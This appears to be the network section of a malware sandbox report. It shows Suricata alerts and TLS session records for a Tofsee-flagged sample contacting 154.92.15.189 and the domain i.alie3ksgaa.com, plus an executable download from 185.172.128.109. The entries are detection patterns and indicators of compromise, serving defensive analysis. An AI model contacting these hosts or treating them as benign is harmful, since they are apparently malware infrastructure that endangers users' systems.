TCP 192.168.56.101:50279 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50245 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49290 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50286 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50255 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50287 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50266 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50290 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50270 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50305 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50280 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50311 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50282 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49374 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50320 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50288 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50321 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50293 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50324 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50299 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50325 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50301 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50329 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50302 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50331 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50315 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50333 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50316 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50335 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50322 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50352 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50346 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50371 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50217 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50377 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50219 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50353 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50379 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50221 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50355 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50225 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50356 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50227 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50360 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50238 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50366 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50051 -> 185.172.128.109:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.101:50051 -> 185.172.128.109:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:50240 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50378 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50268 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50380 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50273 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50381 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50383 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50278 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50386 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50283 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.172.128.109:80 -> 192.168.56.101:50051	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:50388 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.172.128.109:80 -> 192.168.56.101:50051	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:50284 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50389 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50298 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50303 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50310 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50314 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50332 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50336 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50338 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50342 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50351 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50359 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50362 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50368 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50369 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50374 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50382 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50385 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50146 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50149 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50154 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50164 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50166 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50181 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50182 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50185 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50186 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50200 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50204 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50214 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50222 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50229 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50231 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50234 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50243 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50261 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50263 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50271 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50274 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50285 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50289 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50292 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50294 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50306 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50308 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50312 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50317 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50326 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50327 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50330 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50344 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50345 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50347 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50350 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50358 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50361 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50364 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50372 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50373 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50375 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50376 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50391 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:50392 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49167 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:49179 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49188 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49182 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49175 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49196 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49213 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49201 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49240 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49202 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49440 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49178 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49208 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49788 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49185 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49235 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49914 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49186 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49292 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50018 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49187 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49482 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50048 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50144 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49189 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50159 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50151 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49192 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50165 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50153 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49198 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50168 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49172 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50170 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49174 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50171 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49177 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50174 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50167 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50175 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49173 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50172 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50179 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50183 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50196 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50188 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50202 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50207 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49190 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49176 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50209 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49205 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49200 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50213 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49207 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49203 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50230 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49221 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49211 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50237 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49474 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49291 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50244 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49609 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49180 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49311 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50256 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49851 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49542 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50026 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50265 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49184 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49735 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50203 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49199 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50052 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49183 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49204 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50145 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49209 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50148 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50155 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50275 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50156 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50276 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50277 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50211 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50281 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50212 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50295 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50220 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50296 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50224 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50300 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49220 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50228 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:49194 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49250 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50235 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49252 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50239 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49280 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50241 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49671 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50246 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49974 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50247 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50106 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50251 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50252 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50257 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50304 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50259 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50313 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50262 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50267 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50323 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50158 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50161 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50027 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50269 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50339 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50152 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50291 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50340 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50157 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50297 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50341 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50160 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50162 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50307 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50169 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50309 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50187 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50318 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50163 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50198 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50319 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50201 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50177 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50328 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50206 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50184 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50334 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:49206 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50189 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50337 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50173 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50190 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50343 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50176 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50178 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50349 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50348 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50180 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50354 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50191 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50357 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50363 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50195 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50208 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50365 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50197 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50367 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50210 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50370 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50192 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50215 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50193 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50216 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50194 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50384 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50223 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50387 154.92.15.189:443	None	None	None
TLSv1 192.168.56.101:50226 154.92.15.189:443	None	None	None
